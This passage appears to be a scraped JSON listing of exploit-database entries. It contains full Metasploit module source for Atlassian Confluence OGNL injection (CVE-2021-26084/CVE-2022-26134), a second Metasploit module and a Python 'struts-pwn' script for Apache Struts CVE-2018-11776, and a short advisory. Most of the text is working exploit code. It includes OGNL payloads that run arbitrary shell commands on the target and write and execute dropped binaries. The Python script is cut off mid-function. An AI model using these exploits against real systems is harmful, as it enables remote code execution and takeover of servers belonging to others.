"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team was\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and in same time, its upper action(s) have no or wildcard\r\nnamespace. Same possibility when using url tag which doesnat have value\r\nand action set and in same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-16T22:39:09", "description": "This Metasploit module exploits a remote code execution vulnerability in Apache Struts versions 2.3 through 2.3.4, and 2.5 through 2.5.16. Remote code execution can be performed via an endpoint that makes use of a redirect action. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-08T00:00:00", "type": "zdt", "title": "Apache Struts 2 Namespace Redirect OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-08T00:00:00", "id": "1337DAY-ID-31056", "href": "https://0day.today/exploit/description/31056", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n # Eschewing CmdStager for now, since the use of '\\' and ';' are killing me\r\n #include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in Apache Struts\r\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\r\n via an endpoint that makes use of a redirect action.\r\n\r\n Native payloads will be converted to executables and dropped in the\r\n server's temp dir. If this fails, try a cmd/* payload, which won't\r\n have to write to the disk.\r\n },\r\n #TODO: Is that second paragraph above still accurate?\r\n 'Author' => [\r\n 'Man Yue Mo', # Discovery\r\n 'hook-s3c', # PoC\r\n 'asoto-r7', # Metasploit module\r\n 'wvu' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['CVE', '2018-11776'],\r\n ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'],\r\n ['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'],\r\n ['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'],\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n [\r\n 'Automatic detection', {\r\n 'Platform' => %w{ unix windows linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Windows', {\r\n 'Platform' => %w{ windows },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n },\r\n ],\r\n [\r\n 'Linux', {\r\n 'Platform' => %w{ unix linux },\r\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\r\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'}\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(8080),\r\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\r\n OptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]),\r\n OptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]),\r\n ]\r\n )\r\n register_advanced_options(\r\n [\r\n OptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]),\r\n OptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ),\r\n OptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ),\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n # METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable\r\n ognl = \"#_memberAccess['allowStaticMethodAccess']\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n # If vulnerable, the server should return an HTTP 302 (Redirect)\r\n # and the 'Location' header should contain either 'true' or 'false'\r\n if resp && resp.headers['Location']\r\n output = resp.headers['Location']\r\n vprint_status(\"Redirected to: #{output}\")\r\n if (output.include? '/true/')\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n elsif (output.include? '/false/')\r\n print_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\")\r\n datastore['ENABLE_STATIC'] = true\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n elsif resp && resp.code==400\r\n # METHOD 2: Generate two random numbers, ask the target to add them together.\r\n # If it does, it's vulnerable.\r\n a = rand(10000)\r\n b = rand(10000)\r\n c = a+b\r\n\r\n ognl = \"#{a}+#{b}\"\r\n\r\n resp = send_struts_request(ognl)\r\n\r\n if resp.headers['Location'].include? c.to_s\r\n vprint_status(\"Redirected to: #{resp.headers['Location']}\")\r\n print_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\")\r\n datastore['ENABLE_STATIC'] = false\r\n CheckCode::Vulnerable\r\n else\r\n CheckCode::Safe\r\n end\r\n end\r\n end\r\n\r\n def exploit\r\n case payload.arch.first\r\n when ARCH_CMD\r\n resp = execute_command(payload.encoded)\r\n else\r\n resp = send_payload()\r\n end\r\n end\r\n\r\n def encode_ognl(ognl)\r\n # Check and fail if the command contains the follow bad characters:\r\n # ';' seems to terminates the OGNL statement\r\n # '/' causes the target to return an HTTP/400 error\r\n # '\\' causes the target to return an HTTP/400 error (sometimes?)\r\n # '\\r' ends the GET request prematurely\r\n # '\\n' ends the GET request prematurely\r\n\r\n # TODO: Make sure the following line is uncommented\r\n bad_chars = %w[; \\\\ \\r \\n] # and maybe '/'\r\n bad_chars.each do |c|\r\n if ognl.include? c\r\n print_error(\"Bad OGNL request: #{ognl}\")\r\n fail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\")\r\n end\r\n end\r\n\r\n # The following list of characters *must* be encoded or ORNL will asplode\r\n encodable_chars = { \"%\": \"%25\", # Always do this one first. :-)\r\n \" \": \"%20\",\r\n \"\\\"\":\"%22\",\r\n \"#\": \"%23\",\r\n \"'\": \"%27\",\r\n \"<\": \"%3c\",\r\n \">\": \"%3e\",\r\n \"?\": \"%3f\",\r\n \"^\": \"%5e\",\r\n \"`\": \"%60\",\r\n \"{\": \"%7b\",\r\n \"|\": \"%7c\",\r\n \"}\": \"%7d\",\r\n #\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal.\r\n #\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n #\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround?\r\n }\r\n\r\n encodable_chars.each do |k,v|\r\n #ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp)\r\n ognl.gsub!(\"#{k}\",\"#{v}\")\r\n end\r\n return ognl\r\n end\r\n\r\n def send_struts_request(ognl, payload: nil)\r\n=begin #badchar-checking code\r\n pre = ognl\r\n=end\r\n\r\n ognl = \"${#{ognl}}\"\r\n vprint_status(\"Submitted OGNL: #{ognl}\")\r\n ognl = encode_ognl(ognl)\r\n\r\n headers = {'Keep-Alive': 'timeout=5, max=1000'}\r\n\r\n if payload\r\n vprint_status(\"Embedding payload of #{payload.length} bytes\")\r\n headers[datastore['HEADER']] = payload\r\n end\r\n\r\n # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs\r\n uri = \"/#{ognl}/#{datastore['ACTION']}\"\r\n\r\n resp = send_request_cgi(\r\n #'encode' => true, # this fails to encode '\\', which is a problem for me\r\n 'uri' => uri,\r\n 'method' => datastore['HTTPMethod'],\r\n 'headers' => headers\r\n )\r\n\r\n if resp && resp.code == 404\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\")\r\n end\r\n\r\n=begin #badchar-checking code\r\n print_status(\"Response code: #{resp.code}\")\r\n #print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body\r\n if resp.headers['Location']\r\n print_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\")\r\n if resp.headers['Location'].split('/')[1] == pre[1..-2]\r\n print_good(\"GOT 'EM!\")\r\n else\r\n print_error(\" #{pre[1..-2]}\")\r\n end\r\n end\r\n=end\r\n\r\n resp\r\n end\r\n\r\n def profile_target\r\n # Use OGNL to extract properties from the Java environment\r\n\r\n properties = { 'os.name': nil, # e.g. 'Linux'\r\n 'os.arch': nil, # e.g. 'amd64'\r\n 'os.version': nil, # e.g. '4.4.0-112-generic'\r\n 'user.name': nil, # e.g. 'root'\r\n #'user.home': nil, # e.g. '/root' (didn't work in testing)\r\n 'user.language': nil, # e.g. 'en'\r\n #'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing)\r\n }\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|('#{rand_text_alpha(2)}')|\r\n properties.each do |k,v|\r\n ognl << %Q|+(@[email\u00a0protected]('#{k}'))+':'|\r\n end\r\n ognl = ognl[0...-4]\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\")\r\n elsif r.headers['Location']\r\n # r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action'\r\n # Extract the OGNL output from the Location path, and strip the two random chars\r\n s = r.headers['Location'].split('/')[1][2..-1]\r\n\r\n if s.nil?\r\n # Since the target didn't respond with an HTTP/400, we know the OGNL code executed.\r\n # But we didn't get any output, so we can't profile the target. Abort.\r\n return nil\r\n end\r\n\r\n # Confirm that all fields were returned, and non include extra (:) delimiters\r\n # If the OGNL fails, we might get a partial result back, in which case, we'll abort.\r\n if s.count(':') > properties.length\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\")\r\n end\r\n\r\n # Separate the colon-delimited properties and store in the 'properties' hash\r\n s = s.split(':')\r\n i = 0\r\n properties.each do |k,v|\r\n properties[k] = s[i]\r\n i += 1\r\n end\r\n\r\n print_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" +\r\n \" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\")\r\n return properties\r\n else\r\n print_error(\"Failed to profile target. Response from server: #{r.to_s}\")\r\n fail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\")\r\n end\r\n end\r\n\r\n def execute_command(cmd_input, opts={})\r\n # Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that.\r\n if cmd_input.include? ';'\r\n print_warning(\"WARNING: Command contains bad characters: semicolons (;).\")\r\n end\r\n\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n if (os.include? 'linux') || (os.include? 'nix')\r\n cmd = \"{'sh','-c','#{cmd_input}'}\"\r\n elsif os.include? 'win'\r\n cmd = \"{'cmd.exe','/c','#{cmd_input}'}\"\r\n else\r\n vprint_error(\"Failed to detect target OS. Attempting to execute command directly\")\r\n cmd = cmd_input\r\n end\r\n\r\n # The following OGNL will run arbitrary commands on Windows and Linux\r\n # targets, as well as returning STDOUT and STDERR. In my testing,\r\n # on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds.\r\n\r\n vprint_status(\"Executing: #{cmd}\")\r\n\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).|\r\n ognl << %q|(#p.redirectErrorStream(true)).|\r\n ognl << %q|(#process=#p.start()).|\r\n ognl << %q|(#r=(@[email\u00a0protected]().getOutputStream())).|\r\n ognl << %q|(@[email\u00a0protected](#process.getInputStream(),#r)).|\r\n ognl << %q|(#r.flush())|\r\n\r\n r = send_struts_request(ognl)\r\n\r\n if r && r.code == 200\r\n print_good(\"Command executed:\\n#{r.body}\")\r\n elsif r\r\n if r.body.length == 0\r\n print_status(\"Payload sent, but no output provided from server.\")\r\n elsif r.body.length > 0\r\n print_error(\"Failed to run command. Response from server: #{r.to_s}\")\r\n end\r\n end\r\n end\r\n\r\n def send_payload\r\n # Probe for the target OS and architecture\r\n begin\r\n properties = profile_target\r\n os = properties[:'os.name'].downcase\r\n rescue\r\n vprint_warning(\"Target profiling was unable to determine operating system\")\r\n os = ''\r\n os = 'windows' if datastore['PAYLOAD'].downcase.include? 'win'\r\n os = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux'\r\n os = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix'\r\n end\r\n\r\n data_header = datastore['HEADER']\r\n if data_header.empty?\r\n fail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\")\r\n end\r\n\r\n random_filename = datastore['TEMPFILE']\r\n\r\n # d = data stream from HTTP header\r\n # f = path to temp file\r\n # s = stream/handle to temp file\r\n ognl = \"\"\r\n ognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC']\r\n ognl << %Q|(#[email\u00a0protected]@getRequest().getHeader('#{data_header}')).|\r\n ognl << %Q|(#[email\u00a0protected]@createTempFile('#{random_filename}','tmp')).|\r\n ognl << %q|(#f.setExecutable(true)).|\r\n ognl << %q|(#f.deleteOnExit()).|\r\n ognl << %q|(#s=new java.io.FileOutputStream(#f)).|\r\n ognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).|\r\n ognl << %q|(#s.write(#d)).|\r\n ognl << %q|(#s.close()).|\r\n ognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).|\r\n ognl << %q|(#p.start()).|\r\n ognl << %q|(#f.delete()).|\r\n\r\n success_string = rand_text_alpha(4)\r\n ognl << %Q|('#{success_string}')|\r\n\r\n exe = [generate_payload_exe].pack(\"m\").delete(\"\\n\")\r\n r = send_struts_request(ognl, payload: exe)\r\n\r\n if r && r.headers && r.headers['Location'].split('/')[1] == success_string\r\n print_good(\"Payload successfully dropped and executed.\")\r\n elsif r && r.headers['Location']\r\n vprint_error(\"RESPONSE: \" + r.headers['Location'])\r\n fail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\")\r\n elsif r && r.code == 400\r\n fail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\")\r\n end\r\n end\r\nend\n\n# 0day.today [2021-09-17] #", "sourceHref": "https://0day.today/exploit/31056", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' % (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. (Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n \r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = \"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in resp.headers.keys():\r\n if str(multiplication_value) in resp.headers['Location']:\r\n print(\"[*] Status: Vulnerable!\")\r\n return(injection_point)\r\n print(\"[*] Status: Not Affected.\")\r\n return(None)\r\n \r\n \r\ndef exploit(url, cmd):\r\n parsed_url = parse_url(url)\r\n \r\n injection_point = check(url)\r\n if injection_point is None:\r\n print(\"[%] Target is not vulnerable.\")\r\n return(0)\r\n print(\"[%] Exploiting...\")\r\n \r\n payload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email\u00a0protected]@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email\u00a0protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd)\r\n \r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload)\r\n \r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n return(1)\r\n \r\n print(\"[%] Response:\")\r\n print(resp.text)\r\n return(0)\r\n \r\n \r\ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):\r\n if url:\r\n if not do_exploit:\r\n check(url)\r\n else:\r\n exploit(url, cmd)\r\n \r\n if usedlist:\r\n URLs_List = []\r\n try:\r\n f_file = open(str(usedlist), \"r\")\r\n URLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\")\r\n try:\r\n URLs_List.remove(\"\")\r\n except 